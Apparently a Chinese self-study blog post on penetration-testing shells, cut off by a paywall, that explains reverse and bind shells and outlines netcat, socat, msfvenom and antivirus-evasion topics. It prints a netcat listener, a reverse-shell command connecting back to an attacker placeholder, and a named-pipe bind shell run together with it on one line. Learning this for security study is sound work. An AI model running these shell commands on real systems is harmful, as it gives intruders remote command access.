前言(每日一遍):
“初闻不明劝离意,回头已是提桶人”
(本贴为自学记录贴)
学完本节你将掌握
- 理解shell的概念
- 学会使用netcat获取绑定shell及反弹shell及稳定化
- 学会使用Socat获取绑定shell及反弹shell
- 学会使用Socat进行shell的加密免杀
- 学会使用msfvenom生成shell
- Staged反弹shell与Stageless反弹shell的区别以及应用
- Webshell的简单介绍
在食用前确保有以下基础(博主精选贴)
一、理解shell
理解shell最简单的例子是当我们在使用命令行环境与计算机进行交互。简单来说,我们可以强制远程服务器向我们发送对服务器的命令行访问(反向shell),或者在服务器上打开一个端口,我们可以连接到该端口以执行进一步的命令(绑定shell)。
常见的shell可分成两类,第一类称之为反弹shell(Reverse shells),第二类则是绑定shell(bind shells)。反弹shell可以理解为目标被迫执行连接回攻击机的代码,这种shell的好处是可以绕过阻止你连接目标机任意端口的防火墙;绑定shell可以理解为在目标上执行的代码用于启动直接连接到目标上的外壳的侦听器。然后这将向互联网开放,这意味着您可以连接到代码打开的端口并以这种方式获得远程代码执行,但是这种方式可能会被目标机的防火墙拦截。
案例
反弹shell例子:
在攻击机启动如下代码:
sudo nc -lvnp 443
在目标机执行如下代码:
nc <LOCAL-IP> <PORT> -e /bin/bashmkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f #其实这种形式相较于直接nc -lvnp 更安全

最低0.47元/天 解锁文章

被折叠的 条评论
为什么被折叠?



